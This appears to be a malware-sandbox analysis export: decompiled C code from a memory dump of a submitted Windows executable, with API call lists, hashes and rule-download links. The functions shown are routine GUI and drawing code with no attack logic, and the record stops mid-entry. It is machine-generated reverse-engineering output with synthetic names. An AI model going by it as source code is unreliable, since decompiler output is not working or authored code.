Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: MessageSend$CaptureH_prologHelp
String ID:
API String ID: 432264411-0
Opcode ID: e1b481f8ab3cb0a0457f10fb11e261e4e9fb3ec2096bb9291230c0a0342d6718
Instruction ID: 80e039248a87347babf29178317820bee1b7ca75e73936699edc63578028a574
Opcode Fuzzy Hash: e1b481f8ab3cb0a0457f10fb11e261e4e9fb3ec2096bb9291230c0a0342d6718
Instruction Fuzzy Hash: 15219571300205BFEB20AF65DC89FAA7BA9FF44754F118129F245971E2CBB4DC419B64

Uniqueness

Uniqueness Score: -1.00%

Function 004232C5, Relevance: 9.1, APIs: 6, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004232C5(intOrPtr _a4, RECT* _a8, intOrPtr _a12, intOrPtr _a16, struct HBRUSH__* _a20) {
				struct tagRECT _v20;
				struct HBRUSH__* _t46;
				long _t50;
				struct HBRUSH__* _t52;
				intOrPtr _t59;
				struct HBRUSH__* _t60;
				long _t64;
				struct HBRUSH__* _t66;
				intOrPtr _t70;
				intOrPtr _t72;

				CopyRect( &_v20, _a8);
				_v20.right = _v20.left + _a12;
				_t46 = _a20;
				if(_t46 != 0) {
					_t46 =  *(_t46 + 4);
				}
				_t72 = _a4;
				FillRect( *(_t72 + 4),  &_v20, _t46);
				_t50 = _a8->right;
				_v20.right = _t50;
				_v20.left = _t50 - _a12;
				_t52 = _a20;
				if(_t52 != 0) {
					_t52 =  *(_t52 + 4);
				}
				FillRect( *(_t72 + 4),  &_v20, _t52);
				CopyRect( &_v20, _a8);
				_t70 = _a16;
				_v20.bottom = _v20.top + _t70;
				_t59 = _a12;
				_v20.left = _v20.left + _t59;
				_v20.right = _v20.right - _t59;
				_t60 = _a20;
				if(_t60 != 0) {
					_t60 =  *(_t60 + 4);
				}
				FillRect( *(_t72 + 4),  &_v20, _t60);
				_t64 = _a8->bottom;
				_v20.bottom = _t64;
				_v20.top = _t64 - _t70;
				_t66 = _a20;
				if(_t66 != 0) {
					_t66 =  *(_t66 + 4);
				}
				return FillRect( *(_t72 + 4),  &_v20, _t66);
			}

0x004232db
0x004232e5
0x004232e8
0x004232ed
0x004232ef
0x004232ef
0x004232f2
0x00423303
0x00423308
0x0042330b
0x00423311
0x00423314
0x00423319
0x0042331b
0x0042331b
0x00423326
0x0042332f
0x00423331
0x00423339
0x0042333c
0x0042333f
0x00423342
0x00423345
0x0042334a
0x0042334c
0x0042334c
0x00423357
0x0042335c
0x0042335f
0x00423364
0x00423367
0x0042336c
0x0042336e
0x0042336e
0x0042337f

APIs

CopyRect.USER32 ref: 004232DB
FillRect.USER32 ref: 00423303
FillRect.USER32 ref: 00423326
CopyRect.USER32 ref: 0042332F
FillRect.USER32 ref: 00423357
FillRect.USER32 ref: 00423379

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Rect$Fill$Copy
String ID:
API String ID: 4194453840-0
Opcode ID: 1f7a0c567dd02a9799e9569733d7d4d00d166ec089ce18eed205e1d7e4f0d021
Instruction ID: dd711018ace7994bf7c1ba7351bcb303de77ebc25f490cf6722cdbc4bd81ee43
Opcode Fuzzy Hash: 1f7a0c567dd02a9799e9569733d7d4d00d166ec089ce18eed205e1d7e4f0d021
Instruction Fuzzy Hash: EB319A75A0011AAFCF00DFA9CD85DAEBBF8FF08354B488566B914D7211D730EA14DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041CD49, Relevance: 9.1, APIs: 6, Instructions: 76
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0041CD49(void* __ecx, void* __eflags) {
				void* _t57;
				void* _t75;
				void* _t77;

				E00406520(E0042A90C, _t77);
				_t75 = __ecx;
				_push(__ecx);
				E0041A41D(_t77 - 0x40, __eflags);
				 *(_t77 - 4) =  *(_t77 - 4) & 0x00000000;
				GetClientRect( *(__ecx + 0x1c), _t77 - 0x2c);
				GetWindowRect( *(_t75 + 0x1c), _t77 - 0x1c);
				E0041A2F1(_t75, _t77 - 0x1c);
				OffsetRect(_t77 - 0x2c,  ~( *(_t77 - 0x1c)),  ~( *(_t77 - 0x18)));
				E0041A13B(_t77 - 0x40, _t77 - 0x2c);
				OffsetRect(_t77 - 0x1c,  ~( *(_t77 - 0x1c)),  ~( *(_t77 - 0x18)));
				E0041F306(_t75, _t77 - 0x40, _t77 - 0x1c);
				E0041A17D(_t77 - 0x40, _t77 - 0x1c);
				SendMessageA( *(_t75 + 0x1c), 0x14,  *(_t77 - 0x3c), 0);
				E0041F4B4(_t75, _t77 - 0x40, _t77 - 0x1c);
				 *(_t77 - 4) =  *(_t77 - 4) | 0xffffffff;
				_t57 = E0041A48F(_t77 - 0x40);
				 *[fs:0x0] =  *((intOrPtr*)(_t77 - 0xc));
				return _t57;
			}

0x0041ee8e
0x0041ee97
0x0041ee9a
0x0041ee9e
0x0041eea3
0x0041eeae
0x0041eebb
0x0041eec7
0x0041eee2
0x0041eeeb
0x0041ef00
0x0041ef0c
0x0041ef18
0x0041ef27
0x0041ef37
0x0041ef3c
0x0041ef43
0x0041ef4d
0x0041ef55

APIs

__EH_prolog.LIBCMT ref: 0041EE8E

Part of subcall function 0041A41D: __EH_prolog.LIBCMT ref: 0041A422
Part of subcall function 0041A41D: GetWindowDC.USER32(?,?,?,0041AED0,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0041A44B

GetClientRect.USER32 ref: 0041EEAE
GetWindowRect.USER32 ref: 0041EEBB

Part of subcall function 0041A2F1: ScreenToClient.USER32 ref: 0041A305
Part of subcall function 0041A2F1: ScreenToClient.USER32 ref: 0041A30E

OffsetRect.USER32(?,?,?), ref: 0041EEE2

Part of subcall function 0041A13B: ExcludeClipRect.GDI32(?,?,?,?,?), ref: 0041A160
Part of subcall function 0041A13B: ExcludeClipRect.GDI32(?,?,?,?,?), ref: 0041A175

OffsetRect.USER32(?,?,?), ref: 0041EF00

Part of subcall function 0041A17D: IntersectClipRect.GDI32(?,?,?,?,?), ref: 0041A1A2
Part of subcall function 0041A17D: IntersectClipRect.GDI32(?,?,?,?,?), ref: 0041A1B7

SendMessageA.USER32 ref: 0041EF27

Part of subcall function 0041A48F: __EH_prolog.LIBCMT ref: 0041A494
Part of subcall function 0041A48F: ReleaseDC.USER32 ref: 0041A4B3

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Rect$Clip$ClientH_prolog$ExcludeIntersectOffsetScreenWindow$MessageReleaseSend
String ID:
API String ID: 2727942566-0
Opcode ID: 7de316de083159d7223219551aab25396c84a8cce25eaa9a559a5c946e8f9942
Instruction ID: 5eac70104d705e6b181efe7a53c40368cdb347892f906ea361a41ca3bb60cced
Opcode Fuzzy Hash: 7de316de083159d7223219551aab25396c84a8cce25eaa9a559a5c946e8f9942
Instruction Fuzzy Hash: 0721DBB1D0011EABCF15EBA5DC49DEEB77CEB44314F00412AE512E3191DB78A94ACB64

Uniqueness

Uniqueness Score: -1.00%

Function 0041BDC7, Relevance: 9.1, APIs: 6, Instructions: 73
windowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0041BDC7(intOrPtr* __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a12) {
				void* _v8;
				intOrPtr _v16;
				char _v20;
				struct tagRECT _v36;
				struct HDC__* _v48;
				struct HDC__* _v52;
				char _v56;
				struct tagTEXTMETRICA _v112;
				void* __ebp;
				void* _t28;
				int _t38;
				intOrPtr* _t43;
				intOrPtr _t55;
				intOrPtr* _t56;
				intOrPtr _t57;

				_t56 = __ecx;
				_push(0);
				E0041A369( &_v56, __eflags);
				_t28 = SendMessageA( *(__ecx + 0x1c), 0x31, 0, 0);
				_v8 = 0;
				if(_t28 != 0) {
					_v8 = SelectObject(_v52, _t28);
				}
				GetTextMetricsA(_v48,  &_v112);
				_t63 = _v8;
				if(_v8 != 0) {
					SelectObject(_v52, _v8);
				}
				E0041A3DB( &_v56);
				SetRectEmpty( &_v36);
				E00424F9B(_t56, _t63,  &_v36, _a12);
				 *((intOrPtr*)( *_t56 + 0xa0))(0x407, 0,  &_v20);
				_t38 = GetSystemMetrics(6);
				_t57 =  *((intOrPtr*)(_t56 + 0x78));
				_t55 = (_t38 + _v16 << 1) - _v36.bottom - _v36.top - _v112.tmInternalLeading + _v112.tmHeight - 1;
				if(_t55 < _t57) {
					_t55 = _t57;
				}
				_t43 = _a4;
				 *_t43 = 0x7fff;
				 *((intOrPtr*)(_t43 + 4)) = _t55;
				return _t43;
			}

0x0041bdd0
0x0041bdd7
0x0041bdd8
0x0041bde4
0x0041bdf2
0x0041bdf5
0x0041bdfd
0x0041bdfd
0x0041be07
0x0041be0d
0x0041be10
0x0041be18
0x0041be18
0x0041be1d
0x0041be26
0x0041be35
0x0041be48
0x0041be5b
0x0041be67
0x0041be71
0x0041be77
0x0041be79
0x0041be79
0x0041be7b
0x0041be80
0x0041be82
0x0041be87

APIs

Part of subcall function 0041A369: __EH_prolog.LIBCMT ref: 0041A36E
Part of subcall function 0041A369: GetDC.USER32(00000000), ref: 0041A397

SendMessageA.USER32 ref: 0041BDE4
SelectObject.GDI32(?,00000000), ref: 0041BDFB
GetTextMetricsA.GDI32(?,?), ref: 0041BE07
SelectObject.GDI32(?,?), ref: 0041BE18
SetRectEmpty.USER32(?), ref: 0041BE26
GetSystemMetrics.USER32 ref: 0041BE5B

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: MetricsObjectSelect$EmptyH_prologMessageRectSendSystemText
String ID:
API String ID: 1789613188-0
Opcode ID: f3ce4ba8643c189502a2e8205a1fcc3ffbf1915ab82a651b6741dc22f3fbcf87
Instruction ID: 4a213af7df46fba370d1b0da78e664596150d00b2e67ee82928ccd15ad32fd7f
Opcode Fuzzy Hash: f3ce4ba8643c189502a2e8205a1fcc3ffbf1915ab82a651b6741dc22f3fbcf87
Instruction Fuzzy Hash: 5E214C72A00219EFCF00DFA4DC88CEEBBBAFF48304B54402AE502A7250DB346E51CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0041BBD7, Relevance: 9.1, APIs: 6, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041BBD7(struct HWND__* _a4, struct HWND__** _a8) {
				struct HWND__* _t6;
				void* _t12;
				struct HWND__** _t14;
				struct HWND__* _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;

				_t17 = _a4;
				_t16 = _t17;
				if(_t17 != 0) {
					L16:
					if((GetWindowLongA(_t16, 0xfffffff0) & 0x40000000) == 0) {
						L4:
						_t15 = _t16;
						_t6 = _t16;
						if(_t16 == 0) {
							L6:
							if(_t17 == 0 && _t16 != 0) {
								_t16 = GetLastActivePopup(_t16);
							}
							_t14 = _a8;
							if(_t14 != 0) {
								if(_t15 == 0 || IsWindowEnabled(_t15) == 0 || _t15 == _t16) {
									 *_t14 =  *_t14 & 0x00000000;
								} else {
									 *_t14 = _t15;
									EnableWindow(_t15, 0);
								}
							}
							return _t16;
						} else {
							goto L5;
						}
						do {
							L5:
							_t15 = _t6;
							_t6 = GetParent(_t6);
						} while (_t6 != 0);
						goto L6;
					}
					_t16 = GetParent(_t16);
					L15:
					if(_t16 == 0) {
						goto L4;
					}
					goto L16;
				}
				_t12 = E0041BC73();
				if(_t12 != 0) {
					L14:
					_t16 =  *(_t12 + 0x1c);
					goto L15;
				}
				_t12 = E00404DAE();
				if(_t12 != 0) {
					goto L14;
				}
				_t16 = 0;
				goto L4;
			}

0x0041bbdf
0x0041bbe7
0x0041bbe9
0x0041bc50
0x0041bc5e
0x0041bbff
0x0041bc01
0x0041bc03
0x0041bc05
0x0041bc10
0x0041bc12
0x0041bc1f
0x0041bc1f
0x0041bc21
0x0041bc27
0x0041bc2b
0x0041bc67
0x0041bc3c
0x0041bc3f
0x0041bc41
0x0041bc41
0x0041bc2b
0x0041bc70
0x00000000
0x00000000
0x00000000
0x0041bc07
0x0041bc07
0x0041bc08
0x0041bc0a
0x0041bc0c
0x00000000
0x0041bc07
0x0041bc63
0x0041bc4c
0x0041bc4e
0x00000000
0x00000000
0x00000000
0x0041bc4e
0x0041bbeb
0x0041bbf2
0x0041bc49
0x0041bc49
0x00000000
0x0041bc49
0x0041bbf4
0x0041bbfb
0x00000000
0x00000000
0x0041bbfd
0x00000000

APIs

GetParent.USER32(?), ref: 0041BC0A
GetLastActivePopup.USER32(?), ref: 0041BC19
IsWindowEnabled.USER32(?), ref: 0041BC2E
EnableWindow.USER32(?,00000000), ref: 0041BC41
GetWindowLongA.USER32 ref: 0041BC53
GetParent.USER32(?), ref: 0041BC61

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
String ID:
API String ID: 670545878-0
Opcode ID: 57eef139ee9fad572674954af371fb940630e9610c65e8faf2eb96e97349b3f3
Instruction ID: 79cfeeef415f6b616a2a8b62cc4a1a68cb8ced5d87a6c48b433ad5091e6d0582
Opcode Fuzzy Hash: 57eef139ee9fad572674954af371fb940630e9610c65e8faf2eb96e97349b3f3
Instruction Fuzzy Hash: 5F119E327012216B86312A6A9C84BABB398DF94B54F09052FEC00E7314FF28DC8242ED

Uniqueness

Uniqueness Score: -1.00%

Function 00420A8B, Relevance: 9.1, APIs: 6, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00420A8B(intOrPtr _a4) {
				intOrPtr _v4;
				struct HWND__* _t15;
				struct HWND__* _t17;
				signed int _t21;
				intOrPtr _t28;
				void* _t30;
				struct HWND__* _t32;

				_v4 = _t28;
				_t15 = GetWindow(GetDesktopWindow(), 5);
				_t32 = _t15;
				if(_t32 == 0) {
					return _t15;
				} else {
					while(1) {
						_push(_t32);
						_t30 = E00413767();
						if(_t30 != 0) {
							_t19 =  *((intOrPtr*)(_v4 + 0x1c));
							if( *((intOrPtr*)(_v4 + 0x1c)) != _t32 && E004208E0(_t19, _t32) != 0) {
								_t21 = GetWindowLongA(_t32, 0xfffffff0);
								if(_a4 != 0) {
									if((_t21 & 0x18000000) == 0 && ( *(_t30 + 0x24) & 0x00000002) != 0) {
										ShowWindow(_t32, 4);
										 *(_t30 + 0x24) =  *(_t30 + 0x24) & 0xfffffffd;
									}
								} else {
									if((_t21 & 0x18000000) == 0x10000000) {
										ShowWindow(_t32, 0);
										 *(_t30 + 0x24) =  *(_t30 + 0x24) | 0x00000002;
									}
								}
							}
						}
						_t17 = GetWindow(_t32, 2);
						_t32 = _t17;
						if(_t32 == 0) {
							return _t17;
						}
					}
				}
			}

0x00420a8e
0x00420aa1
0x00420aa3
0x00420aa7
0x00420b20
0x00420aa9
0x00420ab1
0x00420ab1
0x00420ab7
0x00420abb
0x00420ac1
0x00420ac6
0x00420ad6
0x00420ae1
0x00420aff
0x00420b0a
0x00420b0c
0x00420b0c
0x00420ae3
0x00420aed
0x00420af2
0x00420af4
0x00420af4
0x00420aed
0x00420ae1
0x00420ac6
0x00420b13
0x00420b15
0x00420b19
0x00000000
0x00420b1c
0x00420b19
0x00420ab1

APIs

GetDesktopWindow.USER32 ref: 00420A94
GetWindow.USER32(00000000), ref: 00420AA1
GetWindowLongA.USER32 ref: 00420AD6
ShowWindow.USER32(00000000,00000000), ref: 00420AF2
ShowWindow.USER32(00000000,00000004), ref: 00420B0A
GetWindow.USER32(00000000,00000002), ref: 00420B13

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Window$Show$DesktopLong
String ID:
API String ID: 3178490500-0
Opcode ID: 75e0d79f770b091ef330ac2764b5b8086804e695f3b5458a2b2fdd0c27fc218f
Instruction ID: 7b09bf3e44239edb134f584a809b554a06cce84e6abb4a59c0b4e2be1682ca92
Opcode Fuzzy Hash: 75e0d79f770b091ef330ac2764b5b8086804e695f3b5458a2b2fdd0c27fc218f
Instruction Fuzzy Hash: 5F11C27170173926D2319664AC49F1FBBDC9F51768FD00616FA10A3286DBACE84186AD

Uniqueness

Uniqueness Score: -1.00%

Function 0042986F, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E0042986F(void* __ecx) {
				int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				int _t14;

				_push(__ecx);
				_push(__ecx);
				_t14 = GetDeviceCaps( *(__ecx + 8), 0xa);
				_v12 = GetDeviceCaps( *(__ecx + 8), 8);
				_v8 = _t14;
				E004298F1(__ecx,  &_v12);
				SetMapMode( *(__ecx + 4), 1);
				SetWindowOrgEx( *(__ecx + 4), 0, 0, 0);
				SetViewportOrgEx( *(__ecx + 4),  *(__ecx + 0x20),  *(__ecx + 0x24), 0);
				IntersectClipRect( *(__ecx + 4), 0xffffffff, 0xffffffff, _v12 + 2, _v8 + 2);
				return E004296EA(_t14, __ecx, 0, 0);
			}

0x00429872
0x00429873
0x00429884
0x0042988f
0x00429898
0x0042989b
0x004298a5
0x004298b3
0x004298c3
0x004298de
0x004298f0

APIs

GetDeviceCaps.GDI32(?,0000000A), ref: 00429884
GetDeviceCaps.GDI32(?,00000008), ref: 0042988D

Part of subcall function 004298F1: GetViewportExtEx.GDI32(?,?,?,?,?,0042981B,?), ref: 00429902
Part of subcall function 004298F1: GetWindowExtEx.GDI32(?,?,?,?,?,0042981B,?), ref: 0042990F

SetMapMode.GDI32(?,00000001), ref: 004298A5
SetWindowOrgEx.GDI32(?,00000000,00000000,00000000), ref: 004298B3
SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 004298C3
IntersectClipRect.GDI32(?,000000FF,000000FF,?,?), ref: 004298DE

Part of subcall function 004296EA: GetViewportExtEx.GDI32(?,?,?,?,?,00429056,00000001), ref: 00429701
Part of subcall function 004296EA: GetWindowExtEx.GDI32(?,?,?,?,?,00429056,00000001), ref: 0042970E
Part of subcall function 004296EA: GetDeviceCaps.GDI32(?,00000058), ref: 00429779
Part of subcall function 004296EA: GetDeviceCaps.GDI32(?,0000005A), ref: 00429796
Part of subcall function 004296EA: SetMapMode.GDI32(00000000,00000008), ref: 004297BC
Part of subcall function 004296EA: SetWindowExtEx.GDI32(00000000,?,?,00000000), ref: 004297CD
Part of subcall function 004296EA: SetViewportExtEx.GDI32(00000000,?,?,00000000), ref: 004297DE

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: CapsDeviceViewportWindow$Mode$ClipIntersectRect
String ID:
API String ID: 1729379761-0
Opcode ID: a4606df614c38f46bd77f44db7aac540e81f224dfc611dbedfe682ee8124c0ad
Instruction ID: ffdc988b3e99ab10a3d87d522c915a36f24d74d83ef75783a8118d4b02154ef1
Opcode Fuzzy Hash: a4606df614c38f46bd77f44db7aac540e81f224dfc611dbedfe682ee8124c0ad
Instruction Fuzzy Hash: 10012D31600204BFDB315B56DC4AD5BBFB9EF89B20B40462DF166921A0DB71AD11DB64

Uniqueness

Uniqueness Score: -1.00%

Function 004215FF, Relevance: 9.1, APIs: 6, Instructions: 53
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E004215FF(void* __ecx, struct HWND__* _a4, intOrPtr _a8) {
				void* _v8;
				char _v12;
				char _v532;
				void* __ebp;
				long _t19;
				void* _t23;
				void* _t27;

				_push( &_v8);
				_push( &_v12);
				_push(_a8);
				_t27 = __ecx;
				_push(0x3e8);
				L0040C37C();
				lstrcpynA( &_v532, GlobalLock(_v8), 0x208);
				_t19 = GlobalUnlock(_v8);
				_push(_v8);
				_push(0x8000);
				_push(0x3e4);
				_push(0x3e8);
				_push(_a8);
				L0040C376();
				PostMessageA(_a4, 0x3e4,  *(_t27 + 0x1c), _t19);
				if(E004166B3(_t27) != 0) {
					_t23 = E00424BFB();
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t23 + 4)))) + 0x94))( &_v532);
				}
				return 0;
			}

0x0042160e
0x00421612
0x00421618
0x0042161b
0x0042161d
0x0042161e
0x00421639
0x00421642
0x00421648
0x00421650
0x00421655
0x00421656
0x00421657
0x0042165a
0x00421667
0x00421679
0x0042167b
0x0042168e
0x0042168e
0x00421697

APIs

UnpackDDElParam.USER32(000003E8,?,?,?), ref: 0042161E
GlobalLock.KERNEL32 ref: 00421626
lstrcpynA.KERNEL32(?,00000000,00000208), ref: 00421639
GlobalUnlock.KERNEL32(?), ref: 00421642
ReuseDDElParam.USER32(?,000003E8,000003E4,00008000,?), ref: 0042165A
PostMessageA.USER32 ref: 00421667

Part of subcall function 004166B3: IsWindowEnabled.USER32(?), ref: 004166BD

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: GlobalParam$EnabledLockMessagePostReuseUnlockUnpackWindowlstrcpyn
String ID:
API String ID: 2333435275-0
Opcode ID: ece78e31169d89b8200c4b439bb097272c644a8961ddb8c6434ced5d484acce8
Instruction ID: 4c25832e6e6faa34b872796a1f01560d3fa617591b77e043d0f58556844ee018
Opcode Fuzzy Hash: ece78e31169d89b8200c4b439bb097272c644a8961ddb8c6434ced5d484acce8
Instruction Fuzzy Hash: 86018436600108FFDB11ABA1DC89EDF7BBDEF58304F004175B909E6161DB349E559BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A8B4, Relevance: 9.0, APIs: 6, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A8B4(struct HWND__* _a4) {
				struct HWND__* _t3;
				struct HWND__* _t7;
				struct HWND__* _t9;
				struct HWND__* _t11;

				_t3 = GetFocus();
				_t11 = _t3;
				if(_t11 != 0) {
					_t9 = _a4;
					if(_t11 != _t9) {
						if(E0041A759(_t11, 3) != 0) {
							L5:
							if(_t9 == 0 || (GetWindowLongA(_t9, 0xfffffff0) & 0x40000000) == 0) {
								L8:
								return SendMessageA(_t11, 0x14f, 0, 0);
							}
							_t7 = GetParent(_t9);
							_t3 = GetDesktopWindow();
							if(_t7 != _t3) {
								goto L8;
							}
						} else {
							_t3 = GetParent(_t11);
							_t11 = _t3;
							if(_t11 != _t9) {
								_t3 = E0041A759(_t11, 2);
								if(_t3 != 0) {
									goto L5;
								}
							}
						}
					}
				}
				return _t3;
			}

0x0041a8b7
0x0041a8bd
0x0041a8c1
0x0041a8c3
0x0041a8c9
0x0041a8db
0x0041a8f2
0x0041a8f4
0x0041a915
0x00000000
0x0041a91f
0x0041a907
0x0041a90b
0x0041a913
0x00000000
0x00000000
0x0041a8dd
0x0041a8de
0x0041a8e0
0x0041a8e4
0x0041a8e9
0x0041a8f0
0x00000000
0x00000000
0x0041a8f0
0x0041a8e4
0x0041a8db
0x0041a8c9
0x0041a928

APIs

GetFocus.USER32(?,?,?,00421870,?), ref: 0041A8B7

Part of subcall function 0041A759: GetWindowLongA.USER32 ref: 0041A76A

GetParent.USER32(00000000), ref: 0041A8DE

Part of subcall function 0041A759: GetClassNameA.USER32(00000000,?,0000000A), ref: 0041A785
Part of subcall function 0041A759: lstrcmpiA.KERNEL32(?,combobox), ref: 0041A794

GetWindowLongA.USER32 ref: 0041A8F9
GetParent.USER32(?), ref: 0041A907
GetDesktopWindow.USER32 ref: 0041A90B
SendMessageA.USER32 ref: 0041A91F

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Window$LongParent$ClassDesktopFocusMessageNameSendlstrcmpi
String ID:
API String ID: 2818563221-0
Opcode ID: 702e787500185d0e95f91e2b00d5798637d6bfb9626d06ae0c90c1e83ac116f9
Instruction ID: 0ef3fffee83f5250149677f0c627e80be30cc9893a9c62ed2a9ad1800b3459ea
Opcode Fuzzy Hash: 702e787500185d0e95f91e2b00d5798637d6bfb9626d06ae0c90c1e83ac116f9
Instruction Fuzzy Hash: 27F0F9712022212AD23127355C4CBEF53689F86B58F5A0527F411E62D0EB1CDDD241AE

Uniqueness

Uniqueness Score: -1.00%

Function 0041A7CE, Relevance: 9.0, APIs: 6, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E0041A7CE(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
				struct tagRECT _v20;
				struct HWND__* _t22;

				ClientToScreen(_a4,  &_a8);
				_push(5);
				_push(_a4);
				while(1) {
					_t22 = GetWindow();
					if(_t22 == 0) {
						break;
					}
					if(GetDlgCtrlID(_t22) == 0xffff || (GetWindowLongA(_t22, 0xfffffff0) & 0x10000000) == 0) {
						L5:
						_push(2);
						_push(_t22);
						continue;
					} else {
						GetWindowRect(_t22,  &_v20);
						_push(_a12);
						if(PtInRect( &_v20, _a8) != 0) {
							return _t22;
						}
						goto L5;
					}
				}
				return 0;
			}

0x0041a7dd
0x0041a7e9
0x0041a7eb
0x0041a7ee
0x0041a7f0
0x0041a7f4
0x00000000
0x00000000
0x0041a801
0x0041a832
0x0041a832
0x0041a834
0x00000000
0x0041a813
0x0041a818
0x0041a81e
0x0041a830
0x00000000
0x0041a837
0x00000000
0x0041a830
0x0041a801
0x00000000

APIs

ClientToScreen.USER32(?,?), ref: 0041A7DD
GetWindow.USER32(?,00000005), ref: 0041A7EE
GetDlgCtrlID.USER32 ref: 0041A7F7
GetWindowLongA.USER32 ref: 0041A806
GetWindowRect.USER32 ref: 0041A818
PtInRect.USER32(?,?,?), ref: 0041A828

Memory Dump Source

